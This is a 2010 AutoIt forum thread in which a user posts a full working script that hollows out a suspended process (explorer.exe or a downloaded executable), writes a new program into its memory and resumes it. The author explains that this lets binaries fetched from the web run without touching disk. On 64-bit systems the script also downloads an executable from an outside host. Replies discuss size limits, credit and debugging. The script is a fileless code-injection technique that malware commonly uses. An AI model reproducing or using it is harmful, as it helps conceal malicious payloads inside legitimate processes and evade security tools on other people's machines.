IchBistTod Posted June 18, 2010 Share Posted June 18, 2010 (edited) I was recently trying to get trancexx's memory injection script to work on both 64 and 32 systems. I realized the solution, the file being injected into had to be 1)larger than the exe you are attempting to execute 2)32 bit application I took the time to look through the windows 7 + vista 32 bit files in the syswow64 folder, and none can be used to execute files from memory, they give an initialization error, i see this may be related to the fact some or most are compiled with .net and/or have protection from such methods. So my solution was to make a small script modification and added a switch to determine what file to use, I know there might have been a cleaner way to do this, but here is my go at it. ps: the file i use on 64 bit is reshacker.exe a publically available program, just google it. Tested on XP 32 bit, win 7 64 bit, wind vista 64 bit not tested on Vista or 7 32 bit. MUST BE COMPILED TO 32 BIT REGARDLESS OF OPERATING SYSTEM MUST USE A 32 BIT EXE TO INJECT INTO MEMORY expandcollapse popup#Region ;**** Directives created by AutoIt3Wrapper_GUI **** #AutoIt3Wrapper_UseX64=n #AutoIt3Wrapper_Res_Language=1033 #EndRegion ;**** Directives created by AutoIt3Wrapper_GUI **** global $baseexe $baseexe = @WindowsDir&"\explorer.exe" if @OSArch = "X64" Then ;if not 32bit downlood reshacker and set it to be used if not FileExists(@ScriptDir&"\launcher.exe") Then InetGet("http://panics.co.cc/downloads/reshacker.exe", @ScriptDir&"\launcher.exe") EndIf $baseexe = @ScriptDir&"\launcher.exe" Else $baseexe = @WindowsDir&"\explorer.exe";else use explorer. EndIf ; YOUR CODE HERE Func _RunExeFromMemory($bBinaryImage, $iCompressed = 0, $test = 0) #Region 1. PREPROCESSING PASSED Local $tInput = DllStructCreate("byte[" & BinaryLen($bBinaryImage) & "]") DllStructSetData($tInput, 1, $bBinaryImage) Local $pPointer If $iCompressed Then ; Buffer for decompressed data Local $tBuffer = DllStructCreate("byte[" & 32 * DllStructGetSize($tInput) & "]") ; oversizing it ; Decompression follows: Local $aCall = DllCall("ntdll.dll", "int", "RtlDecompressBuffer", _ "ushort", 2, _ "ptr", DllStructGetPtr($tBuffer), _ "dword", DllStructGetSize($tBuffer), _ "ptr", DllStructGetPtr($tInput), _ "dword", DllStructGetSize($tInput), _ "dword*", 0) If @error Or $aCall[0] Then ; If any troubles try original data anyway $pPointer = DllStructGetPtr($tInput) Else $pPointer = DllStructGetPtr($tBuffer) EndIf Else ; Not compressed $pPointer = DllStructGetPtr($tInput) EndIf #Region 2. CREATING NEW PROCESS ; STARTUPINFO structure (actually all that really matters is allocaed space) Local $tSTARTUPINFO = DllStructCreate("dword cbSize;" & _ "ptr Reserved;" & _ "ptr Desktop;" & _ "ptr Title;" & _ "dword X;" & _ "dword Y;" & _ "dword XSize;" & _ "dword YSize;" & _ "dword XCountChars;" & _ "dword YCountChars;" & _ "dword FillAttribute;" & _ "dword Flags;" & _ "ushort ShowWindow;" & _ "ushort Reserved2;" & _ "ptr Reserved2;" & _ "ptr hStdInput;" & _ "ptr hStdOutput;" & _ "ptr hStdError") ; This is much important. This structure will hold some very important data. Local $tPROCESS_INFORMATION = DllStructCreate("ptr Process;" & _ "ptr Thread;" & _ "dword ProcessId;" & _ "dword ThreadId") ; Create new process $aCall = DllCall("kernel32.dll", "int", "CreateProcessW", _ "wstr", $baseexe, _ ; try something else too (now only range plays, giving us a space) "ptr", 0, _ "ptr", 0, _ "ptr", 0, _ "int", 0, _ "dword", 4, _ ; CREATE_SUSPENDED ; <- this is essential "ptr", 0, _ "ptr", 0, _ "ptr", DllStructGetPtr($tSTARTUPINFO), _ "ptr", DllStructGetPtr($tPROCESS_INFORMATION)) If @error Or Not $aCall[0] Then Return SetError(2, 0, 0) ; CreateProcess function or call to it failed EndIf ; New process and thread handles: Local $hProcess = DllStructGetData($tPROCESS_INFORMATION, "Process") Local $hThread = DllStructGetData($tPROCESS_INFORMATION, "Thread") #Region 3. FILL CONTEXT STRUCTURE ; CONTEXT structure is what's really important here. It's very 'misterious' Local $tCONTEXT = DllStructCreate("dword ContextFlags;" & _ "dword Dr0;" & _ "dword Dr1;" & _ "dword Dr2;" & _ "dword Dr3;" & _ "dword Dr6;" & _ "dword Dr7;" & _ "dword ControlWord;" & _ "dword StatusWord;" & _ "dword TagWord;" & _ "dword ErrorOffset;" & _ "dword ErrorSelector;" & _ "dword DataOffset;" & _ "dword DataSelector;" & _ "byte RegisterArea[80];" & _ "dword Cr0NpxState;" & _ "dword SegGs;" & _ "dword SegFs;" & _ "dword SegEs;" & _ "dword SegDs;" & _ "dword Edi;" & _ "dword Esi;" & _ "dword Ebx;" & _ ; this is pointer to another structure whose third element will be altered "dword Edx;" & _ "dword Ecx;" & _ "dword Eax;" & _ ; another manipulation point (will set address of entry point here) "dword Ebp;" & _ "dword Eip;" & _ "dword SegCs;" & _ "dword EFlags;" & _ "dword Esp;" & _ "dword SegS") DllStructSetData($tCONTEXT, "ContextFlags", 0x10002) ; CONTEXT_INTEGER ; Fill tCONTEXT structure: $aCall = DllCall("kernel32.dll", "int", "GetThreadContext", _ "ptr", $hThread, _ "ptr", DllStructGetPtr($tCONTEXT)) If @error Or Not $aCall[0] Then DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0) Return SetError(3, 0, 0) ; GetThreadContext function or call to it failed EndIf #Region 4. READ PE-FORMAT ; Start processing passed binary data. 'Reading' PE format follows. Local $tIMAGE_DOS_HEADER = DllStructCreate("char Magic[2];" & _ "ushort BytesOnLastPage;" & _ "ushort Pages;" & _ "ushort Relocations;" & _ "ushort SizeofHeader;" & _ "ushort MinimumExtra;" & _ "ushort MaximumExtra;" & _ "ushort SS;" & _ "ushort SP;" & _ "ushort Checksum;" & _ "ushort IP;" & _ "ushort CS;" & _ "ushort Relocation;" & _ "ushort Overlay;" & _ "char Reserved[8];" & _ "ushort OEMIdentifier;" & _ "ushort OEMInformation;" & _ "char Reserved2[20];" & _ "dword AddressOfNewExeHeader", _ $pPointer) ; Move pointer $pPointer += DllStructGetData($tIMAGE_DOS_HEADER, "AddressOfNewExeHeader") ; move to PE file header Local $sMagic = DllStructGetData($tIMAGE_DOS_HEADER, "Magic") ; Check if it's valid format If Not ($sMagic == "MZ") Then DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0) Return SetError(4, 0, 0) ; MS-DOS header missing. Btw 'MZ' are the initials of Mark Zbikowski in case you didn't know. EndIf Local $tIMAGE_NT_SIGNATURE = DllStructCreate("dword Signature", $pPointer) ; Move pointer $pPointer += 4 ; size of $tIMAGE_NT_SIGNATURE structure ; Check signature If DllStructGetData($tIMAGE_NT_SIGNATURE, "Signature") <> 17744 Then ; IMAGE_NT_SIGNATURE DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0) Return SetError(5, 0, 0) ; wrong signature. For PE image should be "PE\0\0" or 17744 dword. EndIf Local $tIMAGE_FILE_HEADER = DllStructCreate("ushort Machine;" & _ "ushort NumberOfSections;" & _ "dword TimeDateStamp;" & _ "dword PointerToSymbolTable;" & _ "dword NumberOfSymbols;" & _ "ushort SizeOfOptionalHeader;" & _ "ushort Characteristics", _ $pPointer) ; Get number of sections Local $iNumberOfSections = DllStructGetData($tIMAGE_FILE_HEADER, "NumberOfSections") ; Move pointer $pPointer += 20 ; size of $tIMAGE_FILE_HEADER structure Local $tIMAGE_OPTIONAL_HEADER = DllStructCreate("ushort Magic;" & _ "ubyte MajorLinkerVersion;" & _ "ubyte MinorLinkerVersion;" & _ "dword SizeOfCode;" & _ "dword SizeOfInitializedData;" & _ "dword SizeOfUninitializedData;" & _ "dword AddressOfEntryPoint;" & _ "dword BaseOfCode;" & _ "dword BaseOfData;" & _ "dword ImageBase;" & _ "dword SectionAlignment;" & _ "dword FileAlignment;" & _ "ushort MajorOperatingSystemVersion;" & _ "ushort MinorOperatingSystemVersion;" & _ "ushort MajorImageVersion;" & _ "ushort MinorImageVersion;" & _ "ushort MajorSubsystemVersion;" & _ "ushort MinorSubsystemVersion;" & _ "dword Win32VersionValue;" & _ "dword SizeOfImage;" & _ "dword SizeOfHeaders;" & _ "dword CheckSum;" & _ "ushort Subsystem;" & _ "ushort DllCharacteristics;" & _ "dword SizeOfStackReserve;" & _ "dword SizeOfStackCommit;" & _ "dword SizeOfHeapReserve;" & _ "dword SizeOfHeapCommit;" & _ "dword LoaderFlags;" & _ "dword NumberOfRvaAndSizes", _ $pPointer) ; Move pointer $pPointer += 96 ; size of $tIMAGE_OPTIONAL_HEADER Local $iMagic = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "Magic") ; Check if it's 32-bit application If $iMagic <> 267 Then DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0) Return SetError(6, 0, 0) ; not 32-bit application. Structures (and sizes) are for 32-bit apps. EndIf If $test = 1 and $iMagic <> 267 Then DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0) Return 0 EndIf ; Extract entry point address Local $iEntryPointNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "AddressOfEntryPoint") ; if loaded binary image would start executing at this address ; Move pointer $pPointer += 128 ; size of the structures before IMAGE_SECTION_HEADER (16 of them - find PE specification if you are interested). Local $pOptionalHeaderImageBaseNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "ImageBase") ; address of the first byte of the image when it's loaded in memory Local $iOptionalHeaderSizeOfImageNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "SizeOfImage") ; the size of the image including all headers #Region 5. GET AND THEN CHANGE BASE ADDRESS ; Read base address Local $tPEB = DllStructCreate("byte InheritedAddressSpace;" & _ "byte ReadImageFileExecOptions;" & _ "byte BeingDebugged;" & _ "byte Spare;" & _ "ptr Mutant;" & _ "ptr ImageBaseAddress;" & _ "ptr LoaderData;" & _ "ptr ProcessParameters;" & _ "ptr SubSystemData;" & _ "ptr ProcessHeap;" & _ "ptr FastPebLock;" & _ "ptr FastPebLockRoutine;" & _ "ptr FastPebUnlockRoutine;" & _ "dword EnvironmentUpdateCount;" & _ "ptr KernelCallbackTable;" & _ "ptr EventLogSection;" & _ "ptr EventLog;" & _ "ptr FreeList;" & _ "dword TlsExpansionCounter;" & _ "ptr TlsBitmap;" & _ "dword TlsBitmapBits[2];" & _ "ptr ReadOnlySharedMemoryBase;" & _ "ptr ReadOnlySharedMemoryHeap;" & _ "ptr ReadOnlyStaticServerData;" & _ "ptr AnsiCodePageData;" & _ "ptr OemCodePageData;" & _ "ptr UnicodeCaseTableData;" & _ "dword NumberOfProcessors;" & _ "dword NtGlobalFlag;" & _ "ubyte Spare2[4];" & _ "int64 CriticalSectionTimeout;" & _ "dword HeapSegmentReserve;" & _ "dword HeapSegmentCommit;" & _ "dword HeapDeCommitTotalFreeThreshold;" & _ "dword HeapDeCommitFreeBlockThreshold;" & _ "dword NumberOfHeaps;" & _ "dword MaximumNumberOfHeaps;" & _ "ptr ProcessHeaps;" & _ "ptr GdiSharedHandleTable;" & _ "ptr ProcessStarterHelper;" & _ "ptr GdiDCAttributeList;" & _ "ptr LoaderLock;" & _ "dword OSMajorVersion;" & _ "dword OSMinorVersion;" & _ "dword OSBuildNumber;" & _ "dword OSPlatformId;" & _ "dword ImageSubSystem;" & _ "dword ImageSubSystemMajorVersion;" & _ "dword ImageSubSystemMinorVersion;" & _ "dword GdiHandleBuffer[34];" & _ "dword PostProcessInitRoutine;" & _ "dword TlsExpansionBitmap;" & _ "ubyte TlsExpansionBitmapBits[128];" & _ "dword SessionId") $aCall = DllCall("kernel32.dll", "int", "ReadProcessMemory", _ "ptr", $hProcess, _ "ptr", DllStructGetData($tCONTEXT, "Ebx"), _ "ptr", DllStructGetPtr($tPEB), _ "dword", DllStructGetSize($tPEB), _ "dword*", 0) If @error Or Not $aCall[0] Then DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0) Return SetError(7, 0, 0) ; ReadProcessMemory function or call to it failed while filling PEB structure EndIf Local $hBaseAddress = DllStructGetData($tPEB, "ImageBaseAddress") ; Short version of the above #cs $aCall = DllCall("kernel32.dll", "int", "ReadProcessMemory", _ "ptr", $hProcess, _ "ptr", DllStructGetData($tCONTEXT, "Ebx") + 8, _ "ptr*", 0, _ "dword", 4, _ "dword*", 0) If @error Or Not $aCall[0] Then DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0) Return SetError(7, 0, 0) ; ReadProcessMemory function or call to it failed while reading base address of the process EndIf Local $hBaseAddress = $aCall[3] #ce ; Write new base address $aCall = DllCall("kernel32.dll", "int", "WriteProcessMemory", _ "ptr", $hProcess, _ "ptr", DllStructGetData($tCONTEXT, "Ebx") + 8, _ "ptr*", $pOptionalHeaderImageBaseNEW, _ "dword", 4, _ "dword*", 0) If @error Or Not $aCall[0] Then DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0) Return SetError(8, 0, 0) ; WriteProcessMemory function or call to it failed while writting new base address EndIf #Region 6. CLEAR EVERYTHING THAT THIS NEW PROCESS HAVE MAPPED ; Clear old data. $aCall = DllCall("ntdll.dll", "int", "NtUnmapViewOfSection", _ "ptr", $hProcess, _ "ptr", $hBaseAddress) If @error Or $aCall[0] Then DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0) Return SetError(9, 0, 0) ; NtUnmapViewOfSection function or call to it failed EndIf #Region 7. ALLOCATE 'NEW' MEMORY SPACE ; Allocate proper size of memory at the proper place. $aCall = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", _ "ptr", $hProcess, _ "ptr", $pOptionalHeaderImageBaseNEW, _ "dword", $iOptionalHeaderSizeOfImageNEW, _ "dword", 12288, _ ; MEM_COMMIT|MEM_RESERVE "dword", 64) ; PAGE_EXECUTE_READWRITE If @error Or Not $aCall[0] Then DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0) Return SetError(10, 0, 0) ; VirtualAllocEx function or call to it failed EndIf Local $pRemoteCode = $aCall[0] ; from now on this is zero-point #Region 8. GET AND WRITE NEW PE-HEADERS Local $pHEADERS_NEW = DllStructGetPtr($tIMAGE_DOS_HEADER) ; starting address of binary image headers Local $iOptionalHeaderSizeOfHeadersNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "SizeOfHeaders") ; the size of the MS-DOS stub, the PE header, and the section headers ; Write NEW headers $aCall = DllCall("kernel32.dll", "int", "WriteProcessMemory", _ "ptr", $hProcess, _ "ptr", $pRemoteCode, _ "ptr", $pHEADERS_NEW, _ "dword", $iOptionalHeaderSizeOfHeadersNEW, _ "dword*", 0) If @error Or Not $aCall[0] Then DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0) Return SetError(11, 0, 0) ; WriteProcessMemory function or call to it while writting new PE headers failed EndIf #Region 9. WRITE SECTIONS ; Dealing with sections. Will write them too as they hold all needed data that PE loader reads Local $tIMAGE_SECTION_HEADER Local $iSizeOfRawData, $pPointerToRawData Local $iVirtualAddress For $i = 1 To $iNumberOfSections $tIMAGE_SECTION_HEADER = DllStructCreate("char Name[8];" & _ "dword UnionOfVirtualSizeAndPhysicalAddress;" & _ "dword VirtualAddress;" & _ "dword SizeOfRawData;" & _ "dword PointerToRawData;" & _ "dword PointerToRelocations;" & _ "dword PointerToLinenumbers;" & _ "ushort NumberOfRelocations;" & _ "ushort NumberOfLinenumbers;" & _ "dword Characteristics", _ $pPointer) $iSizeOfRawData = DllStructGetData($tIMAGE_SECTION_HEADER, "SizeOfRawData") $pPointerToRawData = DllStructGetPtr($tIMAGE_DOS_HEADER) + DllStructGetData($tIMAGE_SECTION_HEADER, "PointerToRawData") $iVirtualAddress = DllStructGetData($tIMAGE_SECTION_HEADER, "VirtualAddress") ; If there is data to write, write it where is should be written If $iSizeOfRawData Then $aCall = DllCall("kernel32.dll", "int", "WriteProcessMemory", _ "ptr", $hProcess, _ "ptr", $pRemoteCode + $iVirtualAddress, _ "ptr", $pPointerToRawData, _ "dword", $iSizeOfRawData, _ "dword*", 0) If @error Or Not $aCall[0] Then DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0) Return SetError(12, $i, 0) ; WriteProcessMemory function or call to it while writting new sections failed EndIf EndIf ; Move pointer $pPointer += 40 ; size of $tIMAGE_SECTION_HEADER structure Next #Region 10. NEW ENTRY POINT ; Entry point manipulation DllStructSetData($tCONTEXT, "Eax", $pRemoteCode + $iEntryPointNEW) ; $iEntryPointNEW was relative address #Region 11. SET NEW CONTEXT ; New context: $aCall = DllCall("kernel32.dll", "int", "SetThreadContext", _ "ptr", $hThread, _ "ptr", DllStructGetPtr($tCONTEXT)) If @error Or Not $aCall[0] Then DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0) Return SetError(13, 0, 0) ; SetThreadContext function or call to it failed EndIf #Region 12. RESUME THREAD ; And that's it!. Continue execution $aCall = DllCall("kernel32.dll", "int", "ResumeThread", "ptr", $hThread) If @error Or $aCall[0] = -1 Then DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0) Return SetError(14, 0, 0) ; ResumeThread function or call to it failed EndIf #Region 13. RETURN SUCCESS ; All went well. Return, for example, new PID: Return DllStructGetData($tPROCESS_INFORMATION, "ProcessId") EndFunc Edited June 18, 2010 by IchBistTod yutijang and Cahkhene25 2 [center][/center][center]=][u][/u][/center][center][/center] Link to comment Share on other sites More sharing options...
Tinnu Posted June 20, 2010 Share Posted June 20, 2010 can you explain that what is benefit of running exe from memory? Link to comment Share on other sites More sharing options...
IchBistTod Posted June 21, 2010 Author Share Posted June 21, 2010 can you explain that what is benefit of running exe from memory?The ability to run an exe without ever having to place it on the user's hard drive.for example using _inetgetsource() to get the binary then running it from memory would mean it would never touch the user's hard drive.There are many uses, but i find this form of cloud executing the most useful. [center][/center][center]=][u][/u][/center][center][/center] Link to comment Share on other sites More sharing options...
Tinnu Posted June 21, 2010 Share Posted June 21, 2010 it means the script 'll run directly from RAM and not from HDD? Link to comment Share on other sites More sharing options...
Shafayat Posted June 22, 2010 Share Posted June 22, 2010 it means the script 'll run directly from RAM and not from HDD?- That's affirmative. But isn't it too obvious? After reading the first post in the thread, this question should not arise. yutijang 1 [Not using this account any more. Using "iShafayet" instead] Link to comment Share on other sites More sharing options...
WeMartiansAreFriendly Posted June 22, 2010 Share Posted June 22, 2010 ; CONTEXT structure is what's really important here. It's very 'misterious' Why do you use global variables [$baseexe] in your function? Maybe a better example and some documentation would clear up the confusion. Don't bother, It's inside your monitor!------GUISetOnEvent should behave more like HotKeySet() Link to comment Share on other sites More sharing options...
IchBistTod Posted June 22, 2010 Author Share Posted June 22, 2010 (edited) also note to everyone. no simply creating a .exe with null data, or "pumping" an exe to make it bigger wont work. Windows considers the end of the binary for the app the total size of the base exe. Edited June 23, 2010 by IchBistTod [center][/center][center]=][u][/u][/center][center][/center] Link to comment Share on other sites More sharing options...
Shafayat Posted June 23, 2010 Share Posted June 23, 2010 no simpyl creating a .exe with null data, or "pumping" an exe tomake it bigger wont work.How do you suggest to perfectly increase the size without flagging an error event on runtime? My experiment was a failure regarding this. [Not using this account any more. Using "iShafayet" instead] Link to comment Share on other sites More sharing options...
IchBistTod Posted June 23, 2010 Author Share Posted June 23, 2010 How do you suggest to perfectly increase the size without flagging an error event on runtime? My experiment was a failure regarding this.well right now as im using it to exe off the web im simply limiting my tools to <800kb.However if you wanted to store it in the exe you could try putting the binary of the app you wanna run in the resource data of the autoit exe, and use @scriptfullpath for the base exe, making it launch off itself(which SHOULD work cuz the autoit exe would be the size of the binary in the resources + the original size.This is untested, but im pretty sure windows counts binary resource data into the total size of the file. [center][/center][center]=][u][/u][/center][center][/center] Link to comment Share on other sites More sharing options...
Shafayat Posted June 23, 2010 Share Posted June 23, 2010 Thank you. I am going to test it tonight with @ScriptFullPath [Not using this account any more. Using "iShafayet" instead] Link to comment Share on other sites More sharing options...
IchBistTod Posted June 24, 2010 Author Share Posted June 24, 2010 also take note to my EOF function which is required for some files to be ran from memoryhttp://www.autoitscript.com/forum/index.php?showtopic=116022 [center][/center][center]=][u][/u][/center][center][/center] Link to comment Share on other sites More sharing options...
IchBistTod Posted July 1, 2010 Author Share Posted July 1, 2010 Why do you use global variables [$baseexe] in your function? Maybe a better example and some documentation would clear up the confusion. This global variable is the location of a 32 bit exe larger than the file to execute from memory on the local machine. This will be a "shell" for the binary you want to execute. It will appear to the OS as if you are launching this file, however the process is stopped at runtime and your binary is injected into the process. On vista and 7 this file must be larger than the binary you are executing (for security reasons), and it must always be a 32 bit exe. Using a switch to declare this exe based on the environment allows it to be declared/downloaded only once and multipule calls to the function to be made off that oen base exe. I hope I explained this correctly. I am a bit tired. [center][/center][center]=][u][/u][/center][center][/center] Link to comment Share on other sites More sharing options...
IchBistTod Posted July 5, 2010 Author Share Posted July 5, 2010 (edited) Thank you.I am going to test it tonight with @ScriptFullPathSo I assume thats a negative on success via stated method? Edited July 5, 2010 by IchBistTod [center][/center][center]=][u][/u][/center][center][/center] Link to comment Share on other sites More sharing options...
IchBistTod Posted July 5, 2010 Author Share Posted July 5, 2010 Also, two stars? Two freaking stars? Honestly? Those who provided such rating must either be too ignorant to use it, too ignorant to understand it, or too ignorant to appreciate it. No matter, those intelligent enough to make use of it when such need is required will have the ability to do so. [center][/center][center]=][u][/u][/center][center][/center] Link to comment Share on other sites More sharing options...
Kip Posted July 5, 2010 Share Posted July 5, 2010 (edited) Also, two stars?Two freaking stars?Honestly?Those who provided such rating must either be too ignorant to use it, too ignorant to understand it, or too ignorant to appreciate it.No matter, those intelligent enough to make use of it when such need is required will have the ability to do so.And just because of that ungrateful post, I rated 1 star.But instead of stars, there should be little red flames to indicate negative ratings.Edit: You do know where the "Edit" button is, right? Because posting 4 posts right after each other is just "Bumping" to me. The last two only have 3 minutes between them, instead of the recommended 24 hours. Edited July 5, 2010 by Kip MailSpons: Fake SMTP server for safe email testing Dutch postcode & address API. Link to comment Share on other sites More sharing options...
Ascend4nt Posted July 5, 2010 Share Posted July 5, 2010 IchBistTod, the post topic is a bit misleading (32/64 bit), especially when you write:MUST BE COMPILED TO 32 BIT REGARDLESS OF OPERATING SYSTEMMUST USE A 32 BIT EXE TO INJECT INTO MEMORYAnd why aren't there any links to trancexx's original 'Run binary' thread you borrow your code from? Also, amazingly her code works on 64-bit executables (as well as O/S's from XP to Win7). The size of exe's may be an issue that you resolve though, so at least that is a bit of progress. My contributions: Performance Counters in Windows - Measure CPU, Disk, Network etc Performance | Network Interface Info, Statistics, and Traffic | CPU Multi-Processor Usage w/o Performance Counters | Disk and Device Read/Write Statistics | Atom Table Functions | Process, Thread, & DLL Functions UDFs |Â Process CPU Usage Trackers | PE File Overlay Extraction | A3X Script Extract | File + Process Imports/Exports Information | Windows Desktop Dimmer Shade | Spotlight + Focus GUI - Highlight and Dim for Eyestrain Relief | CrossHairs (FullScreen) |Â Rubber-Band Boxes using GUI's (_GUIBox) | GUI Fun! | IE Embedded Control Versioning (use IE9+ and HTML5 in a GUI) | Magnifier (Vista+) Functions UDF | _DLLStructDisplay (Debug!) | _EnumChildWindows (controls etc) | _FileFindEx | _ClipGetHTML | _ClipPutHTML + ClipPutHyperlink | _FileGetShortcutEx | _FilePropertiesDialog | I/O Port Functions | File(s) Drag & Drop | _RunWithReducedPrivileges | _ShellExecuteWithReducedPrivileges | _WinAPI_GetSystemInfo | dotNETGetVersions | Drive(s) Power Status | _WinGetDesktopHandle | _StringParseParameters | Screensaver, Sleep, Desktop Lock Disable | Full-Screen Crash Recovery Wrappers/Modifications of others' contributions: _DOSWildcardsToPCRegEx (original code: RobSaunder's) | WinGetAltTabWinList (original: Authenticity) UDF's added support/programming to: _ExplorerWinGetSelectedItems | MIDIEx UDF (original code: eynstyne) (All personal code/wrappers centrally located at Ascend4nt's AutoIT Code) Link to comment Share on other sites More sharing options...
dekadish Posted October 17, 2010 Share Posted October 17, 2010 IchBistTod, the post topic is a bit misleading (32/64 bit), especially when you write:And why aren't there any links to trancexx's original 'Run binary' thread you borrow your code from? Also, amazingly her code works on 64-bit executables (as well as O/S's from XP to Win7). The size of exe's may be an issue that you resolve though, so at least that is a bit of progress.I have tryed it and it works.. but it doesnt work on some Windows Machines.. i tested it on windows7 ultimate, XP and one some XP's it works and some dont.. i dont know why.. Maybe it depeends what language is the OS is or something? Link to comment Share on other sites More sharing options...
sunsunshine Posted August 17, 2011 Share Posted August 17, 2011 IchBistTod , Can you give me an example ? I used these Code ,but failure, $hFile=FileOpen(@systemdir&"\regedt32.exe",16) $bFile=FileRead($hFile) _RunExeFromMemory($bFile) Link to comment Share on other sites More sharing options...
Watson Posted August 17, 2011 Share Posted August 17, 2011 IchBistTod , Can you give me an example ? I used these Code ,but failure,$hFile=FileOpen(@systemdir&"\regedt32.exe",16)$bFile=FileRead($hFile)_RunExeFromMemory($bFile)Try adding:Global $baseexe = @WindowsDir & "\explorer.exe" Link to comment Share on other sites More sharing options...
Magellan Posted August 18, 2011 Share Posted August 18, 2011 Hello, Same as SunSunshine. I used a similar code and the injection doesn't work on X64 :-( (The goal is to inject a 32bit exe in the memory of a X64 platform) @Watson : Can you please explain me why this instruction "Global $baseexe = @WindowsDir & "\explorer.exe" could solve the problem ? I don't understand. Thanks. Mag. Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now